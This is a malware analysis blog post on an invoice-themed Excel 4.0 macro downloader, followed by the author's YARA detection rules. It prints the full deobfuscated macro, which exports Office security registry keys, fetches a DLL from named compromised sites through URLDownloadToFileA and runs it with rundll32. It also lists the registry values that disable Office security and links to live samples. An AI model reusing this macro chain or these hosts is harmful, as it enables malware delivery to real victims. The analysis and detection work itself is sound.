[Custom #YARA ] #XLS #macro based #malware downloader using URLDownloadToFileA

Received numbers of sample submission of invoice themed XLS which are not getting detected on VT properly using any reputed Anti Virus engine. There is nothing abnormal happening except it is showing following screen when opened.

Pretty unusual - huh !

So, after finding few sample which is successfully evading anti virus detection, started analyzing it deeper. If you need for of the samples check below, and you know the password :-)

Download here

When try to get / decrypt the Macro, 1^stwe failed to decode as it was too much encoded with char() . Later, successfully decoded it and found it is using known but never patched method to exploit and evade using URLDownloadToFileA function in macro. And, to be specific, that is the only IOC which is static on all variants.

OLE Dumped

And decoded the macro successfully.

SET.VALUE(Sheet2!IU50054,"603.5")
GOTO(GC58642)
SET.VALUE(Sheet2!FJ520,"-266")
GOTO(HQ50120)
SET.VALUE(Sheet2!AL37792,"-70.5")
RUN(Sheet2!FT7151)
SET.VALUE(Sheet2!DD20793,"187")
RUN(Sheet2!FE47168)
SET.VALUE(Sheet2!ET28189,"-112")
RUN(Sheet2!BN31589)
SET.VALUE(Sheet2!DA45099,"-233")
RUN(Sheet2!CK5515)
SET.VALUE(Sheet2!CX60873,"38")
RUN(Sheet2!DN30160)
SET.VALUE(Sheet2!IM61116,"-181")
RUN(Sheet2!CR57286)
SET.VALUE(Sheet2!FI55763,"485")
GOTO(BI3343)
SET.VALUE(Sheet2!HU4013,"-392")
RUN(Sheet2!GL24843)
FORMULA.FILL("=CLOSE(FALSE)",Sheet2!AP2874)
RUN(Sheet2!DR50273)
FORMULA.FILL("=APP.MAXIMIZE()",Sheet2!DR50274)
APP.MAXIMIZE()
GOTO(BY60756)
FORMULA.FILL("=IF(GET.WINDOW(7),GOTO(R[-57883]C[-35]),)",Sheet2!BY60757)
IF(GET.WINDOW(7),GOTO(R[-57883]C[-35]),)
[TRUE] GOTO(R[-57883]C[-35])
	CLOSE(FALSE)
[FALSE]
	GOTO(AR17888)
	FORMULA.FILL("=IF(GET.WINDOW(20),,GOTO(R[-15015]C[-2]))",Sheet2!AR17889)
	IF(GET.WINDOW(20),,GOTO(R[-15015]C[-2]))
	[TRUE]
		GOTO(IC38647)
		FORMULA.FILL("=IF(GET.WINDOW(23)<3,GOTO(R[-35774]C[-195]),)",Sheet2!IC38648)
		IF(GET.WINDOW(23)<3,GOTO(R[-35774]C[-195]),)
		[TRUE] GOTO(R[-35774]C[-195])
			CLOSE(FALSE)

		[FALSE]
			GOTO(DL56235)
			FORMULA.FILL("=IF(GET.WORKSPACE(31),GOTO(R[-53362]C[-74]),)",Sheet2!DL56236)
			IF(GET.WORKSPACE(31),GOTO(R[-53362]C[-74]),)
				GOTO(AI42329)
				FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,GOTO(R[-39456]C[7]),)",Sheet2!AI42330)
				IF(GET.WORKSPACE(13)<770,GOTO(R[-39456]C[7]),)
				[TRUE] GOTO(R[-39456]C[7])
					CLOSE(FALSE)
				[FALSE]
					RUN(Sheet2!EC61077)
					FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,GOTO(R[-58204]C[-91]),)",Sheet2!EC61078)
					IF(GET.WORKSPACE(14)<390,GOTO(R[-58204]C[-91]),)
					[TRUE] GOTO(R[-58204]C[-91])
						CLOSE(FALSE)
					[FALSE]
						GOTO(DV56081)
						FORMULA.FILL("=IF(GET.WORKSPACE(19),,GOTO(R[-53208]C[-84]))",Sheet2!DV56082)
						IF(GET.WORKSPACE(19),,GOTO(R[-53208]C[-84]))
							RUN(Sheet2!BF5530)
							FORMULA.FILL("=IF(GET.WORKSPACE(42),,GOTO(R[-2657]C[-16]))",Sheet2!BF5531)
							IF(GET.WORKSPACE(42),,GOTO(R[-2657]C[-16]))
								RUN(Sheet2!BW56518)
								FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-53645]C[-33]))",Sheet2!BW56519)
								IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-53645]C[-33]))
									GOTO(BA24640)
									FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!U29297)
									GOTO(GS12483)
									FORMULA.FILL("=""C:\Users\Public\BJQz.reg""",Sheet2!GG13083)
									RUN(Sheet2!IH9923)
									FORMULA.FILL("=R[11185]C[-200]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-5029]C[-32]&"" /y""",Sheet2!HM18112)
									RUN(Sheet2!BE37059)
									FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Sheet2!BR1070)
									GOTO(DX36926)
									FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-35857]C[-58],R[-18815]C[93],0,5)",Sheet2!DX36927)
									CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",BR1070,HM18112,0,5)
									GOTO(IL24463)
									FORMULA.FILL("=WHILE(ISERROR(FILES(R[-11383]C[-57])))",Sheet2!IL24466)
									FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Sheet2!IL24467)
									FORMULA.FILL("=NEXT()",Sheet2!IL24468)
									WHILE(None)
									WAIT(NOW()+"00:00:01")
									NEXT()
									RUN(Sheet2!HF58150)
									FORMULA.FILL("=FOPEN(R[-45068]C[-25])",Sheet2!HF58151)
									FOPEN(None)
									RUN(Sheet2!EA52968)
									FORMULA.FILL("=FPOS(R[5182]C[83],215)",Sheet2!EA52969)
									FPOS(None,215)
									GOTO(IL31788)
									FORMULA.FILL("=FREAD(R[26362]C[-32],255)",Sheet2!IL31789)
									FREAD(None,255)
									RUN(Sheet2!GU34282)
									FORMULA.FILL("=FCLOSE(R[23868]C[11])",Sheet2!GU34283)
									FCLOSE(None)
									GOTO(GD24554)
									FORMULA.FILL("=FILE.DELETE(R[-11472]C[3])",Sheet2!GD24555)
									FILE.DELETE(R[-11472]C[3])
									RUN(Sheet2!AT9255)
									FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[22533]C[200])),GOTO(R[-6382]C[-4]),)",Sheet2!AT9256)
									IF(ISNUMBER(SEARCH("0001",R[22533]C[200])),GOTO(R[-6382]C[-4]),)
										RUN(Sheet2!DJ39803)
										FORMULA.FILL("=""C:\Users\Public\dmZKMu9.html""",Sheet2!DG45107)
										RUN(Sheet2!HV56850)
										FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!ER34659)
										GOTO(Z3253)
										FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[31405]C[122],R[41853]C[85],0,0)",Sheet2!Z3254)
										CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,ER34659,DG45107,0,0)
										GOTO(ES30940)
										FORMULA.FILL("=FILES(R[14166]C[-38])",Sheet2!ES30941)
										FILES(None)
										RUN(Sheet2!FP21816)
										FORMULA.FILL("=IF(ISERROR(R[9124]C[-23]),GOTO(R[-18943]C[-130]),)",Sheet2!FP21817)
										IF(ISERROR(R[9124]C[-23]),GOTO(R[-18943]C[-130]),)
										[TRUE] GOTO(R[-18943]C[-130])
											CLOSE(FALSE)
										[FALSE]
											GOTO(N10779)
											SET.VALUE(Sheet2!FX63533,"1128.75")
											RUN(Sheet2!AD50594)
											SET.VALUE(Sheet2!DB43942,"-352")
											GOTO(DN12209)
											SET.VALUE(Sheet2!FK3415,"-317")
											GOTO(GN54489)
											SET.VALUE(Sheet2!BC60123,"445")
											GOTO(ET21636)
											SET.VALUE(Sheet2!EU1370,"-486")
											GOTO(K28169)
											SET.VALUE(Sheet2!FS12907,"1.4")
											RUN(Sheet2!DT52679)
											SET.VALUE(Sheet2!DY58778,"-369")
											RUN(Sheet2!DV60433)
											SET.VALUE(Sheet2!FY48733,"2822")
											RUN(Sheet2!GZ39514)
											SET.VALUE(Sheet2!K41285,"-365")
											RUN(Sheet2!FB7187)
											SET.VALUE(Sheet2!HF50420,"310")
											RUN(Sheet2!DE25860)
											FORMULA.FILL("=""C:\Users\Public\gcVRxxj.html""",Sheet2!EP42683)
											RUN(Sheet2!AA52168)
											FORMULA.FILL("=""http://almakaaseb.com/wp-content/uploads/2020/05/wp-front.php""",Sheet2!DN14765)
											RUN(Sheet2!AH39400)
											FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-41757]C[-8],R[-13839]C[20],0,0)",Sheet2!DV56522)
											RUN(Sheet2!EB57810)
											FORMULA.FILL("=FILES(R[-20704]C[106])",Sheet2!AN63387)
											GOTO(X6830)
											FORMULA.FILL("=IF(ISERROR(R[35824]C[15]),,RUN(R[6459]C[147]))",Sheet2!Y27563)
											RUN(Sheet2!DX31918)
											FORMULA.FILL("=""https://neebank.com/wp-content/uploads/2020/05/wp-front.php""",Sheet2!IQ9884)
											GOTO(HV20034)
											FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-28492]C[124],R[4307]C[19],0,0)",Sheet2!DW38376)
											GOTO(P41555)
											FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!EL9811)
											RUN(Sheet2!GJ26109)
											FORMULA.FILL("=ALERT(R[-24211]C[-30])",Sheet2!FP34022)
											RUN(Sheet2!BW52793)
											FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",Sheet2!FK44585)
											GOTO(HP32700)
											FORMULA.FILL("=R[18663]C[27]&"",DllRegisterServer""",Sheet2!DO24020)
											RUN(Sheet2!GX50702)
											FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-8436]C[-54],R[-29001]C[-102],0,5)",Sheet2!HM53021)
											RUN(Sheet2!DV56522)
											CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,DN14765,EP42683,0,0)
											GOTO(AN63387)
											FILES(None)
											GOTO(Y27563)
											IF(ISERROR(R[35824]C[15]),,RUN(R[6459]C[147]))
											[TRUE]
												GOTO(IQ9884)
												"https://neebank.com/wp-content/uploads/2020/05/wp-front.php"
												GOTO(DW38376)
												CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://neebank.com/wp-content/uploads/2020/05/wp-front.php""",EP42683,0,0)
												GOTO(EL9811)
												"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
												GOTO(FP34022)
												ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
												RUN(Sheet2!FK44585)
												"C:\Windows\system32\rundll32.exe"
												GOTO(DO24020)
												EP42683,DllRegisterServer
												GOTO(HM53021)
												CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","EP42683,DllRegisterServer",0,5)
												GOTO(AP2874)
												CLOSE(FALSE)
											[FALSE] RUN(Sheet2!FP34022)
												ALERT(None)
												RUN(Sheet2!FK44585)
												"C:\Windows\system32\rundll32.exe"
												GOTO(DO24020)
												EP42683,DllRegisterServer
												GOTO(HM53021)
												CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","EP42683,DllRegisterServer",0,5)
												GOTO(AP2874)
												CLOSE(FALSE)
	[FALSE] GOTO(R[-15015]C[-2])
		CLOSE(FALSE)

Quite big and boring - but really interesting. So, once macro enabled, it is executing reg.exe and adding entry to windows registry

Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\SysWOW64\reg.exe EXPORT HKCU\Software\Microsoft\Office\16.0\Excel\Security C:\Users\Public\5Gqo.reg /y

Following Entry added to Registry ( More still under analysis )

Windows Registry Editor Version 500
[HKEY_CURRENT_USER\Software\Microsoft\Office\140\Excel\Security]
"Level"=dword:00000000"
AccessVBOM"=dword:00000000
"VBAWarnings"=dword:00000000
"DisableAllActiveX"=dword:00000000
"UFIControls"=dword:00000000
"DataConnectionWarnings"=dword:00000000
"WorkbookLinkWarnings"=dword:00000000
"ExtensionHardening"=dword:00000000
"PackagerPrompt"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Office\140\Excel\Security\filevalidation]
"Enable"=On

On the most samples I found - It is connecting with following 2 URLs till now, but numbers are increasing rapidly. Seems those are hacked WordPress websites.

https://lifeprimary[.]site/wp-keys[.]php
https://luckystatus[.]com/wp-keys[.]php

Remove [] , you know the drill

Till now, it is acting as Evader and Exploiter. And as stated, not detected as virus at all by any AV engine. Once queries those sites, from those php files, a DLL file getting pushed. And, from the behavior what we understood, it is depending on the threat actor – which malware / backdoor they want to deliver as payload for persistent access and data dump. We found 2 of the dll files after analyzing few variants. But seems - it is more of Malware as a Service model, as all new samples coming with different compromised host and different malware behind it.

In few cased - seems they are using ZLOADER , but it is different on different cases.

There are increasing numbers of those kind of XLS files worldwide, seems a new wave of attack launched.

Testing a custom yara rules as I came up with some patterns.

[UPDATE] Yara rule testing is done . My yara rule is working well with present variant, whereas reputated AV on VirusTotal still not able to detect it. Microsoft published an advance hunting query for one variant on their blog, but that is more SHA value based - didn't like it personally. So, here is mine .

//  Excel files with macros pushing registry and downloading malware
rule macro_downloader_v1
{
meta:
	author = "Krishnendu Paul"
	description = "Malware Pushing XLS detection May 2020 Stage 1"
    strings:
	$ole_marker	= {D0 CF 11 E0 A1 B1 1A E1}
	$meta_author	= "Administrator" 
	$meta_app	= "Excel"
	$macro_s1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
	$macro_s2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
    
condition:
      $ole_marker at 0 and 1 of ($macro_s*) and all of ($meta_*) and filesize < 300000
}

rule macro_downloader_v2 //Stage 2 and 3 variants
{
meta:
	author = "Krishnendu Paul"
	description = "Malware Pushing XLS detection May 2020"
    strings:
    	$meta_value1 =	"##0\\)"
    	$meta_author	= "Administrator"
		$meta_app	= "Excel"
 
condition:
	 all of ($meta_*) and filesize < 300000
}

Hope it helps.

Krishnendu Paul

Recommended for you

XLS

Allowing #XLSM and #XLSB files ? Stop it to save your Infra

I understand that a company having legacy systems running always. But, are you permitting XLSM and XLSB filetypes ? #STOP it as fast as possible !! Following images are from a malware packer, possibly related with latest #Zloader and other infections. Credit @DissectMalware [https://twitter.com/DissectMalware]From the 2nd screenshot it

4 years ago • 1 min read

TA505

#TA505 find subdomain to download #Dropper #Malware

So ... if you have main domain from #TA505 TTPs and want to download the dropper file from actual subdomain , following is the method So, found 2 TTPs today from twitter But, subdomains are not there. Without disturbing the poster, goto https://[DOMAIN] It will show you a certificate error page.

4 years ago • 1 min read

TA505

#Yara Rule for #TA505 Latest Campaign

rule ta505_downloader { meta: author = "Krishnendu Paul" description = "TA505 June 2020" strings: $meta_hex = "document.getElementById" $meta_app = "template.innerHTML" $meta_filetype = "iframeTemplate" $meta_b = "element.innerHTML" condition: all of ($meta_*) and filesize < 250000 }

4 years ago • 1 min read